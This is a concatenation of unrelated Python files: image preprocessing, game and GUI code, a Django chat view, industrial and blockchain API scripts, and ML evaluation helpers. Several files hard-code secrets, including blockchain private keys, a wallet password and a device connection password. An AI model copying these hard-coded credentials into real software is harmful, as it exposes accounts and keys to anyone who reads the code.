rgb_scaled[:,:,2] = (rgb_scaled[:,:,2] - VGG_MEAN[2])/128
return rgb_scaled
# Convert RGB to BGR
red, green, blue = tf.split(3, 3, rgb_scaled)
# assert red.get_shape().as_list()[1:] == [224, 224, 1]
# assert green.get_shape().as_list()[1:] == [224, 224, 1]
# assert blue.get_shape().as_list()[1:] == [224, 224, 1]
#bgr = tf.concat(3, [
# blue - VGG_MEAN[0],
# green - VGG_MEAN[1],
# red - VGG_MEAN[2],
#])
# assert bgr.get_shape().as_list()[1:] == [224, 224, 3]
def pad(self, data):
if self._padHeight and self._padWidth:
if data.ndim == 3:
npad = ((0,self._padHeight-data.shape[0]),(0,self._padWidth-data.shape[1]),(0,0))
elif data.ndim == 2:
npad = ((0, self._padHeight - data.shape[0]), (0, self._padWidth - data.shape[1]))
padData = np.pad(data, npad, mode='constant', constant_values=0)
else:
padData = data
return padData
|
import unittest
from lib.models import *
from lib.generator import RandomFiller
class TestGameModels(unittest.TestCase):
randomFiller = RandomFiller()
def test_player_generator(self):
pl = self.randomFiller.get_player()
self.assertIsInstance(pl, Player)
self.assertIsNotNone(pl.name)
self.assertIsNotNone(pl.role)
def test_team_generator(self):
team = self.randomFiller.get_team()
self.assertIsNot(len(team.players), 0)
self.assertIsNotNone(team.coach)
self.assertIsNotNone(team.get_avg_age())
self.assertIsNotNone(team.get_avg_skill())
if __name__ == '__main__':
unittest.main()
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
import rg
class Robot:
def act(self, game):
# jeżeli jesteś w środku, broń się
if self.location == rg.CENTER_POINT:
return ['guard']
# jeżeli wokół są przeciwnicy, atakuj
for poz, robot in game.robots.iteritems():
if robot.player_id != self.player_id:
if rg.dist(poz, self.location) <= 1:
return ['attack', poz]
# idź do środka planszy
return ['move', rg.toward(self.location, rg.CENTER_POINT)]
|
from django.shortcuts import render, redirect
from django.http import HttpResponse
from django.utils.safestring import mark_safe
from django.contrib.auth.decorators import login_required
import json
# Create your views here.
def index(request):
return render(request, 'index.html',{})
@login_required
def room(request, room_name):
return render(request, 'room.html', {
'room_name': room_name,
'username': mark_safe(json.dumps(request.user.username)),
})
|
# MIT License
#
# Copyright (c) 2020, Bosch Rexroth AG
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import sys
import signal
import time
import datalayer
import datalayerprovider.my_provider_node
connectionProvider = "tcp://boschrexroth:[email protected]:2070"
def run_provider(provider : datalayer.provider.Provider):
print("Starting provider...")
provider_node = datalayerprovider.my_provider_node.MyProviderNode()
with datalayer.provider_node.ProviderNode(provider_node.cbs, 1234) as node:
result = provider.register_node("myData/myString", node)
if result != datalayer.variant.Result.OK:
print("Register Data Provider failed with: ", result)
result= provider.start()
if result != datalayer.variant.Result.OK:
print("Starting Provider failed with: ", result)
print("Provider started...")
print("Running endless loop...")
count=0
while True:
count=count+1
if count > 9:
break
time.sleep(1)
result = provider.stop()
if result != datalayer.variant.Result.OK:
print("Stopping Provider failed with: ", result)
result = provider.unregister_node("myData/myString")
if result != datalayer.variant.Result.OK:
print("Unregister Data Provider failed with: ", result)
def run():
print("Simple Snap for ctrlX Datalayer Provider with Python")
print("Connect to ctrlX CORE: ", connectionProvider)
print("Create and start ctrlX Datalayer System")
with datalayer.system.System("") as datalayer_system:
datalayer_system.start(False)
print("Creating provider...")
with datalayer_system.factory().create_provider(connectionProvider) as provider:
run_provider(provider)
datalayer_system.stop(True)
|
meuCartao = int(input("Digite o número do cartão de crédito: "))
cartaolido = 1
encontreiMeuCartaoNaLista = False
while cartaolido != 0 and not encontreiMeuCartaoNaLista:
cartaolido = int(input("Digite o número do próximo cartão de crédito: "))
if cartaolido == meuCartao:
encontreiMeuCartaoNaLista = True
if encontreiMeuCartaoNaLista:
print("Encontrei!!!")
else:
print("Não encontrei :(") |
"""Evaluate model and calculate results for SMP-CAIL2020-Argmine.
Author: Tsinghuaboy [email protected]
"""
from typing import List
import codecs
import pandas
import torch
from tqdm import tqdm
from sklearn import metrics
# from classmerge import classy_dic, indic
LABELS = [0,1]
threshold = 0.8
def calculate_accuracy_f1(
golds: List[str], predicts: List[str]) -> tuple:
"""Calculate accuracy and f1 score.
Args:
golds: answers
predicts: predictions given by model
Returns:
accuracy, f1 score
"""
return metrics.accuracy_score(golds, predicts), \
metrics.f1_score(
golds, predicts,
labels=LABELS, average='macro')
# def get_labels_from_file(filename):
# """Get labels on the last column from file.
#
# Args:
# filename: file name
#
# Returns:
# List[str]: label list
# """
# labels = []
# with codecs.open(filename, 'r', encoding='utf-8') as fin:
# fin.readline()
# for line in fin:
# labels.append(line.strip().split(',')[-1])
# return labels
def get_labels_from_file(filename):
"""Get labels on the last column from file.
Args:
filename: file name
Returns:
List[str]: label list
"""
data_frame = pandas.read_csv(filename)
labels = data_frame['summary'].tolist()
return labels
def eval_file(golds_file, predicts_file):
"""Evaluate submission file
Args:
golds_file: file path
predicts_file: file path
Returns:
accuracy, f1 score
"""
golds = get_labels_from_file(golds_file)
predicts = get_labels_from_file(predicts_file)
return calculate_accuracy_f1(golds, predicts)
def evaluate(model, data_loader, device) -> List[str]:
"""Evaluate model on data loader in device.
Args:
model: model to be evaluate
data_loader: torch.utils.data.DataLoader
device: cuda or cpu
Returns:
answer list
"""
model.eval()
input_ids = torch.tensor([], dtype=torch.long).to(device)
outputs = torch.tensor([], dtype=torch.float).to(device)
# segment = torch.tensor([], dtype=torch.long).to(device)
for batch in tqdm(data_loader, desc='Evaluation', ncols=80):
batch = tuple(t.to(device) for t in batch)
with torch.no_grad():
logits = model(*batch)
outputs = torch.cat([outputs, logits[:, :]])
input_ids = torch.cat([input_ids, batch[0][:, :]])
# segment = torch.cat([segment, batch[-1][:, :]])
output_ids = []
output_tokens = []
for i in range(len(outputs)):
if threshold==1:
toppostion = range(len(outputs[i]))
else:
toppostion = torch.topk(outputs[i], int(len(outputs[i]) * threshold), sorted=False, largest=True)[1]
#bits = outputs[i].data.cpu().numpy().round()
output_id = []
for j in toppostion:
if input_ids[i][j]:
output_id.append(input_ids[i][j])
output_ids.append(output_id)
# output_tokens.append(model.bert.convert_ids_to_tokens(output_id))
#
# segment_tokens = []
# for i in range(len(segment)):
# if segment[i] > len(segment_tokens):
# segment_tokens.append("")
# segment_tokens[segment[i]] += output_tokens[i]
# answer_list = []
# predict_support_np = torch.sigmoid(outputs).data.cpu().numpy()
# for i in range(predict_support_np.shape[0]):
# left_ids = []
# for j in range(predict_support_np.shape[1]):
# if predict_support_np[i, j] > 0.5:
# left_ids.append(input_ids[i,j])
# answer_list.append(left_ids)
#
# for i in range(len(outputs)):
# logits = outputs[i]
# answer = int(torch.argmax(logits, dim=-1))
# answer_list.append(answer)
return output_ids
if __name__ == '__main__':
acc, f1_score = eval_file(
'data/train.csv', 'rule_baseline/submission.csv')
print("acc: {}, f1: {}".format(acc, f1_score))
|
#!/usr/bin/env python
import argparse
import logging
import os
import sys
import gi
gi.require_version("Gtk", "3.0")
gi.require_version("Gdk", "3.0")
from .config import load_steady, ConfigError
from .gui_handlers import SetupHandler, ConfigHandler
from .msikeyboard import MSIKeyboard, UnknownModelError
from .parsing import (
parse_usb_id,
parse_preset,
UnknownIdError,
UnknownPresetError,
)
from gi.repository import Gtk
__version__ = "3.0"
DEFAULT_ID = "1038:1122"
DEFAULT_MODEL = "GP75" # Default laptop model if nothing specified
logging.basicConfig()
logging.getLogger().setLevel(logging.INFO)
log = logging.getLogger(__name__)
def run_gui(model, colors_filename, usb_id, setup=False):
builder = Gtk.Builder()
builder.add_from_file(os.path.join(os.path.dirname(__file__), "ui.glade"))
kb_image = builder.get_object("kb_image")
color_selector = builder.get_object("color_selector")
if setup:
h = SetupHandler(model, kb_image)
else:
h = ConfigHandler(
model,
kb_image,
color_selector,
colors_filename,
usb_id,
)
builder.connect_signals(h)
window = builder.get_object("GtkWindow")
window.set_title(f"{model} Keyboard {__version__}")
window.show_all()
Gtk.main()
def main():
parser = argparse.ArgumentParser(
description="Tool to control per-key RGB keyboard backlighting on MSI laptops. https://github.com/Askannz/msi-perkeyrgb"
)
parser.add_argument(
"-v", "--version", action="store_true", help="Prints version and exits."
)
parser.add_argument(
"-c",
"--config",
action="store",
metavar="FILEPATH",
help='Loads the configuration file located at FILEPATH. Refer to the README for syntax. If set to "-", '
"the configuration file is read from the standard input (stdin) instead.",
default="config.msic",
)
parser.add_argument(
"-d", "--disable", action="store_true", help="Disable RGB lighting."
)
parser.add_argument(
"--id",
action="store",
metavar="VENDOR_ID:PRODUCT_ID",
help="This argument allows you to specify the vendor/product id of your keyboard. "
"You should not have to use this unless opening the keyboard fails with the default value. "
"IDs are in hexadecimal format (example : 1038:1122)",
)
parser.add_argument(
"--list-presets",
action="store_true",
help="List available presets for the given laptop model.",
)
parser.add_argument(
"-p", "--preset", action="store", help="Use vendor preset (see --list-presets)."
)
parser.add_argument(
"-m",
"--model",
action="store",
help="Set laptop model (see --list-models). If not specified, will use %s as default."
% DEFAULT_MODEL,
)
parser.add_argument(
"--list-models", action="store_true", help="List available laptop models."
)
parser.add_argument("--setup", action="store_true", help="Open app in setup mode.")
parser.add_argument(
"-s",
"--steady",
action="store",
metavar="HEXCOLOR",
help="Set all of the keyboard to a steady html color. ex. 00ff00 for green",
)
args = parser.parse_args()
if args.version:
print("Version: %s" % __version__)
sys.exit(1)
if args.list_models:
print("Available laptop models are :")
for msi_models, _ in MSIKeyboard.available_msi_keymaps:
for model in msi_models:
print(model)
print(
"\nIf your laptop is not in this list, use the closest one "
"(with a keyboard layout as similar as possible). "
"This tool will only work with per-key RGB models."
)
sys.exit(1)
# Parse laptop model
if not args.model:
print("No laptop model specified, using %s as default." % DEFAULT_MODEL)
msi_model = DEFAULT_MODEL
else:
try:
msi_model = MSIKeyboard.parse_model(args.model)
except UnknownModelError:
print("Unknown MSI model : %s" % args.model)
sys.exit(1)
# Parse USB vendor/product ID
if not args.id:
usb_id = parse_usb_id(DEFAULT_ID)
else:
try:
usb_id = parse_usb_id(args.id)
except UnknownIdError:
print("Unknown vendor/product ID : %s" % args.id)
sys.exit(1)
# Loading presets
msi_presets = MSIKeyboard.get_model_presets(msi_model)
if args.list_presets:
if msi_presets == {}:
print("No presets available for %s." % msi_model)
else:
print("Available presets for %s:" % msi_model)
for preset in msi_presets.keys():
print("\t- %s" % preset)
sys.exit(1)
# Loading keymap
msi_keymap = MSIKeyboard.get_model_keymap(msi_model)
# Loading keyboard
kb = MSIKeyboard.get(usb_id, msi_keymap, msi_presets)
if not kb:
sys.exit(1)
# If user has requested disabling
if args.disable:
kb.set_color_all([0, 0, 0])
kb.refresh()
sys.exit(1)
# If user has requested a preset
elif args.preset:
try:
preset = parse_preset(args.preset, msi_presets)
except UnknownPresetError:
print(
f"Preset {args.preset} not found for model {msi_model}. "
f"Use --list-presets for available options"
)
sys.exit(1)
kb.set_preset(preset)
kb.refresh()
sys.exit(1)
# If user has requested to display a steady color
elif args.steady:
try:
colors_map, warnings = load_steady(args.steady, msi_keymap)
except ConfigError as e:
print("Error preparing steady color : %s" % str(e))
sys.exit(1)
kb.set_colors(colors_map)
kb.refresh()
sys.exit(1)
# If user has not requested anything
else:
if not os.path.isfile(args.config):
with open(args.config, "w") as i:
with open(
os.path.join(os.path.dirname(__file__), "configs", "default.msic")
) as o:
print(
f"Config file {args.config} not found, new created from default"
)
i.write(o.read())
run_gui(msi_model, args.config, usb_id, args.setup)
if __name__ == "__main__":
main()
|
from ai import AIPlayer
import tkinter as tk # GUI
from logika import *
from minimax import *
from clovek import Clovek
from racunalnik import Racunalnik
##################################
# GRAFICNI / UPORABNISKI VMESNIK #
##################################
MIN_SIRINA = 500
MIN_VISINA = 555
ZVP = 100
class Gui:
# Definirajmo si tage za elemente platna
TAG_FIGURA = "figura" # figure igralcev
TAG_OKVIR = "okvir" # Crte, ki predstavljajo igralno povrsino oz. njen okvir
TAG_GUMB = "gumb" # Gumbi
TAG_PETKA = "petka" # Zmagovalna petka
BARVE = {IGRALEC_1: "red", IGRALEC_2: "blue"} # barve igralcev
def __init__(self, master):
self.igralec_1 = None # Objekt, ki igra IGRALCA 1
self.igralec_2 = None # Objekt, ki igra IGRALCA 2
self.igra = None # Objekt, ki predstavlja igro
self.velikost_polja = ZVP # Velikost polja
self.velikost_gap = self.velikost_polja / 20 # Razdalja med okvirjem in figuro
# Ce uporabnik zapre okno se naj klice self.zapri_okno
master.protocol("WM_DELETE_WINDOW", lambda: self.zapri_okno(master))
# Glavni menu
menu = tk.Menu(master)
master.config(menu=menu)
# Podmenu Igra
menu_igra = tk.Menu(menu, tearoff=0)
menu.add_cascade(label="Igra", menu=menu_igra)
# Gumb za zacetek nove igre
menu_igra.add_command(label="Nova igra",
command=self.zacni_igro)
# Podmenu Moznosti
menu_moznosti = tk.Menu(menu, tearoff=0)
menu.add_cascade(label="Moznosti", menu=menu_moznosti)
####################
# IGRALNA POVRSINA #
####################
self.platno = tk.Canvas(master,
width=(NUM_COLS+1) * self.velikost_polja,
height=(NUM_ROWS+1) * self.velikost_polja)
self.platno.pack(fill=tk.BOTH, expand=1, side=tk.RIGHT)
# Narisemo crte
self.narisi_okvir()
# Dolocimo, kaj uporabnikovi kliki naredijo
self.platno.bind("<Button-1>", self.platno_klik)
# Zacnemo igro
self.zacni_igro()
def zapri_okno(self, master):
'''Ta metoda se pokliče, ko uporabnik zapre aplikacijo.'''
# Igralce najprej ustavimo
self.prekini_igralce()
# Zapremo okno
master.destroy()
def prekini_igralce(self):
'''Sporoci igralcem, da morajo nehati razmisljati.'''
if self.igralec_1:
self.igralec_1.prekini()
if self.igralec_2:
self.igralec_2.prekini()
def narisi_okvir(self):
'''Narise okvir igralne povrsine.'''
self.platno.delete(Gui.TAG_OKVIR)
d = self.velikost_polja
xmin = d/2
xmax = xmin + NUM_COLS * d
ymin = d/2
ymax = ymin + NUM_ROWS * d
for i in range(NUM_ROWS+1):
self.platno.create_line(xmin, ymin + i*d, xmax, ymin + i*d)
for i in range(NUM_COLS+1):
self.platno.create_line(xmin + i*d, ymin, xmin + i*d, ymax)
def platno_klik(self, event):
x,y = event.x, event.y
d = self.velikost_polja
if (x < d/2) or (x > d/2 + NUM_COLS * d) or (y < d/2) or (y > d/2 + NUM_ROWS * d):
# Klik je izven igralne povrsine
return
else:
col = int((x-d/2) // d) # V katerem stolpcu smo
p = col + 1 # Poteza do predznaka natancno
row = NUM_ROWS - 1 - int((y-d/2) // d)
if self.igra.board[col][row] != PRAZNO:
# Polje je ze zasedeno
return
elif row == 0:
pass
elif row == NUM_ROWS - 1:
p *= -1
elif self.igra.board[col][row-1] != PRAZNO:
pass
elif self.igra.board[col][(row+1) % NUM_ROWS] != PRAZNO:
p *= -1
# print("Poteza:", p)
# Narocimo igralcu, da odigra kliknjeno potezo
if self.igra.na_potezi == IGRALEC_1:
self.igralec_1.klik(p)
elif self.igra.na_potezi == IGRALEC_2:
self.igralec_2.klik(p)
def povleci_potezo(self, p):
'''Odigra in narise potezo.'''
igralec = self.igra.na_potezi
zmagovalec, petka = self.igra.odigraj_potezo(p)
if zmagovalec is None:
# Poteza ni veljavna
return
self.narisi_potezo(p, Gui.BARVE[igralec])
if zmagovalec == NI_KONEC:
if self.igra.na_potezi == IGRALEC_1:
self.igralec_1.igraj()
elif self.igra.na_potezi == IGRALEC_2:
self.igralec_2.igraj()
else:
self.koncaj_igro(zmagovalec, petka)
def narisi_potezo(self, p, col):
d = self.velikost_polja
x = abs(p) - 1
y = self.igra.vrstice_plus[x] - 1 if p>0 else -(self.igra.vrstice_minus[x]) % NUM_ROWS
xcenter = (x+1) * d
ycenter = (NUM_ROWS-y) * d
gap = self.velikost_gap
self.platno.create_oval(xcenter-d/2+gap, ycenter-d/2+gap,
xcenter+d/2-gap, ycenter+d/2-gap,
fill=col,
width=0,
tag=Gui.TAG_FIGURA)
self.platno.create_text(xcenter, ycenter,
text=str(self.igra.stevilo_potez),
font=("Purisa", 40),
tag=Gui.TAG_FIGURA)
def obarvaj_petko(self, petka, col):
d = self.velikost_polja
for x,y in petka:
ycoord = NUM_ROWS-1-y
self.platno.create_rectangle(d/2 + x*d, d/2 + ycoord*d,
d/2 + (x+1)*d, d/2 + (ycoord+1)*d,
outline=col,
width=4,
tag=Gui.TAG_PETKA)
def zacni_igro(self):
'''Zacne novo/naslednjo igro. Nastavi igralce, tip igre, rezultat itd.'''
self.prekini_igralce()
self.igralec_1 = Clovek(self)
# self.igralec_2 = Clovek(self)
# self.igralec_1 = Racunalnik(self, AIPlayer("ai", 0, 0.9, 0.1))
# self.igralec_1.algoritem.nalozi_strategijo("ai_100k_p1")
# self.igralec_1 = Racunalnik(self, Minimax(4, "alphabeta"))
self.igralec_2 = Racunalnik(self, Minimax(4, "negamax_memo"))
# # self.igralec_1.algoritem.vrednost_polozaja = self.igralec_1.algoritem.vrednost_polozaja_old
# self.igralec_2.algoritem.vrednost_polozaja = self.igralec_2.algoritem.vrednost_polozaja_old
# self.igralec_1.algoritem.bias = 1
# Pobrisemo odigrane poteze
self.platno.delete(Gui.TAG_FIGURA)
self.platno.delete(Gui.TAG_PETKA)
# Ustvarimo novo igro
self.igra = Logika()
# Preverimo, kdo je na potezi
if self.igra.na_potezi == IGRALEC_1:
self.igralec_1.igraj()
elif self.igra.na_potezi == IGRALEC_2:
self.igralec_2.igraj()
def koncaj_igro(self, zmagovalec, petka):
if petka is not None:
self.obarvaj_petko(petka, Gui.BARVE[zmagovalec])
######################################################################
## Glavni program
if __name__ == "__main__":
# Naredimo glavno okno in nastavimo ime
root = tk.Tk()
root.title("Pet v vrsto")
# Nastavimo najmanjso velikost okna
root.minsize(int(MIN_SIRINA), int(MIN_VISINA))
# Naredimo objekt Gui in ga shranimo, sicer ga Python zbrise
aplikacija = Gui(root)
# Kontrolo prepustimo glavnemu oknu
# Funkcija mainloop neha delovati, ko okno zapremo
root.mainloop() |
#!/usr/bin/python
config = [
# enable ldap
{
"/v1/sys/auth/ldap": {
"type": "ldap",
"description": "Login with ldap"
}
},
# configure ldap
{
"/v1/auth/ldap/config": {
"url": "ldap://[myldapserver].net",
"binddn": "cn=[myadminuser],dc=[mydomain],dc=net",
"userdn": "ou=People,dc=[mydomain],dc=net",
"userattr": "uid",
"groupdn": "ou=Group,dc=[mydomain],dc=net",
"groupattr": "cn",
"insecure_tls": "false"
}
},
# enable audit
{
"/v1/sys/audit/file": {
"type": "file",
"description": "enable audit type file",
"options": {
"path": "/storage/data/vault/log/vault_audit.log"
}
}
},
# create policies
{
"/v1/sys/policies/acl/system_admins": {
"policy": {
"path": {
"secret/*": { "capabilities": [ "create", "read", "list", "update" ] },
"policy/*": { "capabilities": [ "create", "read", "list", "update" ] },
"auth/*": { "capabilities": [ "create", "read", "list", "update" ] },
"mount/*": { "capabilities": [ "create", "read", "list", "update" ] }
}
}
}
},
{
"/v1/sys/policies/acl/system_admins_ro": {
"policy": {
"path": {
"secret/*": { "capabilities": [ "read", "list" ] },
"auth/*": { "capabilities": [ "read", "list" ] },
}
}
}
},
# assign policy to ldap group
{ "/v1/auth/ldap/groups/system_admins":
{ "policies": "system_admins",
}
},
{ "/v1/auth/ldap/groups/system_admins_ro":
{ "policies": "system_admins_ro",
}
},
]
approle = [
{
"app": {
"path": [ "secret/prod/app/*", "secret/prod/app_alt/*" ]
}
},
{
"app_dev": {
"path": [ "secret/dev/app/*" ]
}
}
]
|
#-*- coding: utf-8 -*-
import unittest
import os
import sys
import json
import requests
import time
import hashlib
import random
import string
cli_wallet_url = "http://127.0.0.1:8047"
headers = {"content-type": "application/json"}
chain_url = "http://127.0.0.1:8149" # 有些接口cli_wallet没有,使用chain api
# curl https://api.cocosbcx.net
# -d '{"id":1, "method":"call", "params":[0,"get_accounts",[["1.2.5", "1.2.100"]]]}'
def request_post(req_data, is_assert=True, response_log=True, url=cli_wallet_url):
response = json.loads(requests.post(url, data = json.dumps(req_data), headers = headers).text)
print('>> {} {}'.format(req_data['method'], req_data['params']))
if response_log:
#print('\033[1;32;40m')
print("{}\n".format(response))
#print('\033[0m')
if is_assert:
assert 'error' not in response
return response
def random_uppercases(n):
return ''.join([random.choice(string.ascii_uppercase) for i in range(n)])
def random_lowercases(n):
return ''.join([random.choice(string.ascii_lowercase) for i in range(n)])
############# global var
g_owner = "nicotest"
g_pub_key = "COCOS56a5dTnfGpuPoWACnYj65dahcXMpTrNQkV3hHWCFkLxMF5mXpx"
g_pri_key = "5J2SChqa9QxrCkdMor9VC2k9NT4R4ctRrJA6odQCPkb3yL89vxo"
# mainnet
#g_owner = "faucet1"
#g_pub_key = "COCOS4z37sP33MsZS3a94RW3gukpunTcod5yZNDvJskPuhUtDf8Q9rp"
#g_pri_key = "5JcR8oHjMAFqKVdx3SSwM1Ff*********************"
g_contract_name = "contract.gastest100"
g_function_name = "collateral"
g_contract_lua_code = "function {}(to, amount) chainhelper:update_collateral_for_gas('',to,amount) end".format(
g_function_name)
wallet_password = "123456"
g_account2 = "init0"
g_pri_key2 = "5Kj5s6xAkjbFcsGXhP4ioWUk7dZm5aYyKDEWDbWAa5nwA8Paewc"
gas_precision = 100000
transfer_amount = 100000 # core asset
############ end
# std::pair<vector<nh_asset_object>, uint32_t> wallet_api::list_account_nh_asset(
# const string &nh_asset_owner,
# const vector<string> &world_view_name_or_ids,
# uint32_t pagesize,
# uint32_t page,
# nh_asset_list_type list_type)
# {
# return my->_remote_db->list_account_nh_asset(get_account(nh_asset_owner).id, world_view_name_or_ids, pagesize, page, list_type);
# }
#default list_type = owner_and_active
def list_account_nh_asset(owner, world_view_name_or_ids, list_type=4):
print(">>> list_account_nh_asset")
default_pagesize = 5
default_page = 1
req_data = {
"jsonrpc": "2.0",
"method": "list_account_nh_asset",
"params": [owner, world_view_name_or_ids, default_pagesize, default_page, list_type],
"id":1
}
return request_post(req_data, response_log=True)
def list_account_balances(name_or_id):
req_data = {
"jsonrpc": "2.0",
"method": "list_account_balances",
"params": [name_or_id],
"id":1
}
return request_post(req_data, response_log=True)
def get_contract(name_or_id):
req_data = {
"jsonrpc": "2.0",
"method": "get_contract",
"params": [name_or_id],
"id":1
}
response = request_post(req_data)
return response
def register_nh_asset_creator_if_not(account):
req_data = {
"jsonrpc": "2.0",
"method": "register_nh_asset_creator",
"params": [account, 'true'],
"id":1
}
response = request_post(req_data, is_assert=False)
if 'error' in response:
err_message = response['error']['message']
if err_message.find('You had registered to a nh asset creater') != -1:
return True
return False
time.sleep(2)
return True
def lookup_world_view(world_view):
req_data = {
"jsonrpc": "2.0",
"method": "call",
"params": [0, "lookup_world_view", [[world_view]]],
"id":1
}
return request_post(req_data, is_assert=False, url=chain_url)['result']
def create_world_view_if_not_exist(owner, world_view):
result = lookup_world_view(world_view)
if result == [None]:
print("create_world_view")
req_data = {
"jsonrpc": "2.0",
"method": "create_world_view",
"params": [owner, world_view,'true'],
"id":1
}
request_post(req_data)
time.sleep(2)
def contract_create_if_not_exist(owner, contract_name, pub_key, file_name):
req_data = {
"jsonrpc": "2.0",
"method": "get_contract",
"params": [contract_name],
"id":1
}
response = request_post(req_data, is_assert=False)
if 'error' in response:
req_data = {
"jsonrpc": "2.0",
"method": "create_contract_from_file",
"params": [owner, contract_name, pub_key, file_name, 'true'],
"id":1
}
request_post(req_data)
time.sleep(2)
def revise_contract(owner, contract_name, file_name, revise=False):
req_data = {
"jsonrpc": "2.0",
"method": "get_contract",
"params": [contract_name],
"id":1
}
response = request_post(req_data, is_assert=False)
if 'error' not in response:
req_data = {
"jsonrpc": "2.0",
"method": "revise_contract_from_file",
"params": [owner, contract_name, file_name, 'true'],
"id":1
}
request_post(req_data)
time.sleep(2)
def call_contract(caller, contract, function, params, is_assert=True):
# print('params: {}, type: {}'.format(params, type(params)))
req_data = {
"jsonrpc": "2.0",
"method": "call_contract_function",
"params": [caller, contract, function, params, 'true'],
"id":1
}
return request_post(req_data, is_assert, response_log=True)
def import_key_if_not_exist(name, private_key):
req_data = {
"jsonrpc": "2.0",
"method": "list_my_accounts",
"params": [],
"id":1
}
accounts = request_post(req_data, response_log=False)['result']
flag = True
for account in accounts:
if account['name'] == name or account['id'] == name:
flag = False
break
if flag:
req_data = {
"jsonrpc": "2.0",
"method": "import_key",
"params": [name, private_key],
"id":1
}
request_post(req_data)
def get_transaction_by_id(tx_id):
req_data = {
"jsonrpc": "2.0",
"method": "get_transaction_by_id",
"params": [tx_id],
"id":1
}
return request_post(req_data)
def get_object(id):
req_data = {
"jsonrpc": "2.0",
"method": "get_object",
"params": [id],
"id":1
}
return request_post(req_data)['result']
def get_contract_call_tx_result(tx_id):
# time.sleep(2) # 保证合约已执行
operation_results = get_transaction_by_id(tx_id)['result']['operation_results']
print("tx_id: {}, result: {}".format(tx_id, operation_results))
return operation_results
# for op_result in operation_results:
# print(op_result)
# # print(op_result[1]['contract_affecteds'])
def hash256(src):
sha256 = hashlib.sha256()
sha256.update(src.encode('utf-8'))
return sha256.hexdigest()
def hash512(src):
sha512 = hashlib.sha512()
sha512.update(src.encode('utf-8'))
return sha512.hexdigest()
class contract_api_case_test(unittest.TestCase):
@classmethod
def setUpClass(self):
req_data = {
"jsonrpc": "2.0",
"method": "unlock",
"params": [wallet_password],
"id":1
}
request_post(req_data)
import_key_if_not_exist(g_owner, g_pri_key)
self.contract_basic_name = "contract.testapi"
print('{} done\n'.format(sys._getframe().f_code.co_name))
@classmethod
def tearDownClass(self):
req_data = {
"jsonrpc": "2.0",
"method": "lock",
"params": [],
"id":1
}
request_post(req_data)
print('{} done\n'.format(sys._getframe().f_code.co_name))
@unittest.skipIf(False, "test other")
def test_contract_head_block_time(self):
contract_name = self.contract_basic_name + "13.headblocktime"
file_name = os.getcwd() + "/contract_13_head_block_time.lua"
function = "test_head_block_time"
params = []
contract_create_if_not_exist(g_owner, contract_name, g_pub_key, file_name)
# revise_contract(g_owner, contract_name, file_name)
for i in range(0, 600):
print("\n## call contract {} count: {}".format(contract_name, i))
result = call_contract(g_owner, contract_name, function, params)['result']
tx_id = result[0]
get_contract_call_tx_result(tx_id)
print('{} done\n'.format(sys._getframe().f_code.co_name))
if __name__ == "__main__":
unittest.main()
|
"""
Copyright 2020 MPI-SWS
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from z3 import *
from storm.fuzzer.helper_functions import get_tree_depth
def get_max_depth(file_path):
max_depth = 0
ast = parse_smt2_file(file_path)
for assertion in ast:
assertion_depth = get_tree_depth(assertion, 64, optimization=False)
if assertion_depth > max_depth:
max_depth = assertion_depth
return max_depth
def count_asserts(file_path):
number_of_assertions = 0
with open(file_path, 'r') as f:
lines = f.read().splitlines()
for line in lines:
if line.find("(assert") != -1:
number_of_assertions += 1
return number_of_assertions
def count_lines(file_path):
with open(file_path, 'r') as f:
lines = f.read().splitlines()
return len(lines) |
import os
import matplotlib.pyplot as plt
import numpy as np
import pickle
from ssm import HMM
from ssm.messages import forward_pass
from scipy.special import logsumexp
from sklearn.metrics import r2_score
# -------------------------------------------------------------------------------------------------
# model fitting functions
# -------------------------------------------------------------------------------------------------
def collect_model_kwargs(
n_lags_standard, n_lags_sticky, n_lags_recurrent, kappas, observations,
observation_kwargs={}, hierarchical=False, fit_hmm=False):
"""Collect model kwargs.
Args:
n_lags_standard (array-like): number of ar lags for standard transitions
n_lags_sticky (array-like): number of ar lags for sticky transitions
n_lags_recurrent (array-like): number of ar lags for recurrent transitions
kappas (array-like): hyperparam for upweighting diagonal when using sticky transitions
observations (str): 'ar' | 'diagonal_ar' | 'robust_ar' | 'diagonal_robust_ar'
observation_kwargs (dict): additional kwargs for obs (e.g. tags for hierarchical models)
hierarchical (bool): True to fit model with hierarchical observations
fit_hmm (bool): True to include hmm in collected models
Returns:
dict
"""
model_kwargs = {}
if hierarchical:
if len(n_lags_recurrent) > 0 or len(n_lags_sticky) > 0:
raise NotImplementedError('Cannot fit hierarchical models on recurrent or sticky obs')
hier_str = 'hierarchical_'
else:
hier_str = ''
# add hmms with standard transitions
if fit_hmm:
model_kwargs['hmm'] = {
'transitions': 'standard',
'observations': hier_str + 'gaussian',
'observation_kwargs': observation_kwargs}
# add models with standard transitions
for lags in n_lags_standard:
model_kwargs['arhmm-%i' % lags] = {
'transitions': 'standard',
'observations': hier_str + observations,
'observation_kwargs': {**{'lags': lags}, **observation_kwargs}}
# add models with sticky transitions
for lags in n_lags_sticky:
for kappa in kappas:
kap = int(np.log10(kappa))
model_kwargs['arhmm-s%i-%i' % (kap, lags)] = {
'transitions': 'sticky',
